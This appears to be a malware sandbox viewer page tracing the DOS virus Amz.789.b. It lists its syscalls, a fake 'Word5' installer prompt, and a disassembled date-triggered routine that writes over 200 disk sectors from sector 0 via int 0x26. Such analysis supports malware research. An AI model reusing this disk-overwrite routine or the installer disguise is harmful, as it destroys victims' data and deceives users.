Sample viewer

vx.netlux.org/Virus.DOS.Amz.789.b

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:58:00.685800005Z 26 PC: 12d52 | Set disk transfer address
2018-12-17T21:58:00.687333881Z 71 PC: 12d6d | Get current directory
2018-12-17T21:58:00.690003041Z 59 PC: 12d74 | Change current directory
2018-12-17T21:58:00.693766464Z 78 PC: 12d92 | Find first file
2018-12-17T21:58:00.699831757Z 78 PC: 12e23 | Find first file
2018-12-17T21:58:00.705267911Z 78 PC: 12e23 | Find first file
2018-12-17T21:58:00.715452259Z 59 PC: 12f94 | Change current directory
2018-12-17T21:58:00.724306122Z 42 PC: 12f98 | Get date
0x12f98: cmp dx, word ptr [0x3d1]
0x12f9c: jne 0x12fcc
0x12f9e: mov ah, 0x2c
0x12fa0: int 0x21
0x12fa2: cmp ch, byte ptr [0x3d3]
0x12fa6: jb 0x12fcc
0x12fa8: mov cx, 0xc8
0x12fab: xor dx, dx
0x12fad: mov al, 0x19
0x12faf: cmp al, 1
0x12fb1: jne 0x12fb5
0x12fb3: xor al, al
0x12fb5: cmp al, 0xff
0x12fb7: jne 0x12fbb
0x12fb9: mov al, 1
0x12fbb: push ax
0x12fbc: push cx
0x12fbd: int 0x26
0x12fbf: add sp, 2
0x12fc2: pop cx
2018-12-17T21:58:00.726706115Z 25 PC: 12a48 | Get default drive
2018-12-17T21:58:00.728680534Z 9 PC: 12a5e | Display string (String= ' ╔═════════════════════════ Installazione di Word5 by Stefano 1990 ╚═════════════════════════ Installa o Disinstalla (dalla corrente directory) ? >')
2018-12-17T21:58:00.739647849Z 1 PC: 12a62 | Character input